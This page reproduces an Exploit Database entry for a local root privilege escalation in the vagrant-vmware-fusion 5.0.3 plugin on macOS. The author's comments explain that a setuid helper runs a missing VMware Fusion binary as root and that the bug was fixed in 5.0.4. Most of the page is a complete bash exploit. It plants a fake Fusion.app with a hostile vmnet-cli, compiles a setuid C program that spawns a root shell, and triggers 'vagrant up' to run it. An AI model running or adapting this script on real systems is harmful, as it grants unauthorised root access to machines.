Hashicorp vagrant-vmware-fusion 5.0.3 – Local Privilege Escalation

• Exploit Database
• 109 阅读

• 作者： Mark Wadham
  日期： 2017-12-06
• 类别：

  • local
  平台：

  • macos
• 来源：https://www.exploit-db.com/exploits/43219/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162

  # Another day, another root privesc bug in this plugin. Not quite so serious this # time - this one is only exploitable if the user has the plugin installed but # VMware Fusion *not* installed. This is a fairly unlikely scenario but it&apos;s a # straight to root privesc with no user interaction so isn&apos;t the kind of thing # that should be shipping with any software.   # This occurs because the suid root sudo helper that I have discussed in previous # exploit writeups executes /Applications/VMware # Fusion.app/Contents/Library/vmnet-cli # as root, but if the application isn&apos;t installed and we&apos;re a local admin user we # can create a fake app directory with a payload in place of vmnet-cli that gets # executed as root.   # HashiCorp fixed this (very quickly) in 5.0.4.   # https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt # 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a # ------------------------------------------------------------------------------ #!/bin/bash echo echo "#########################################################" echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #" echo "# by m4rkw - https://m4.rkw.io/blog.html#"; echo "#########################################################" echo "# Note: only works when VMWare Fusion is not installed. #" echo "#########################################################" echo   cleanup() { exec 2> /dev/null killall -9 vagrant 1>/dev/null 2>/dev/null kill -9 <code>ps auxwww |egrep &apos;\/vagrant up$&apos; |xargs -L1 |cut -d &apos; &apos; -f2</code> &>/dev/null exec 2> /dev/tty cd rm -rf .vagrant_vmware_fusion_503_exp rm -rf /Applications/VMware\ Fusion.app }   if [ -e "/Applications/VMware Fusion.app" ] ; then echo "Fusion is installed, not exploitable." exit 1 fi   echo "setting up fake app directory..."   mkdir /Applications/VMware\ Fusion.app if [ ! $? -eq 0 ] ; then echo "Failed to create /Applications/VMware Fusion.app." exit 1 fi   mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services   touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services   cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <<EOF #!/bin/bash echo 1>&2 echo "VMware Fusion Information:" 1>&2 echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2 echo EOF   chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx   cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli <<EOF #!/bin/bash chown root:wheel /tmp/vvp_503 chmod 4755 /tmp/vvp_503 EOF   chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli   echo "compiling payload..."   cat > /tmp/vvp_503.c <<EOF #include <unistd.h> int main() { setuid(0); seteuid(0); execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL); return 0; } EOF gcc -o /tmp/vvp_503 /tmp/vvp_503.c rm -f /tmp/vvp_503.c   cd mkdir .vagrant_vmware_fusion_503_exp cd .vagrant_vmware_fusion_503_exp   echo "writing dummy vagrantfile ..."   cat > vagrantfile <<EOF Vagrant.configure(&apos;2&apos;) do |config| config.vm.box = &apos;envimation/ubuntu-xenial&apos; end EOF   echo "triggering vagrant up [stage 1]..."   vagrant up &>/dev/null &   while : do r=<code>ps auxwww |grep &apos;vagrant up&apos; |grep -v grep if [ "$r" == "" ] ; then break fi sleep 0.5 done   echo "dropping dummy machine..."   uuid=<code>ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx echo -n "<code>pwd</code>/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id   echo "triggering vagrant up [stage 2]..."   vagrant up &>/dev/null &   echo "waiting for payload to trigger ..."   count=0 success=0   while : do r=<code>ls -la /tmp/vvp_503 |grep -- &apos;-rwsr-xr-x1 rootwheel&apos; if [ "$r" != "" ] ; then success=1 break fi r=<code>ps auxwww |grep &apos;vagrant up&apos; |grep -v grep if [ "$r" == "" ] ; then break fi sleep 0.2 count=$(($count + 1)) if [ $count -eq 250 ] ; then echo "Timed out waiting for the payload to trigger." cleanup exit 1 fi done   cleanup   if [ ! $success -eq 1 ] ; then echo "exploit failed." exit 1 fi   echo cd /tmp/vvp_503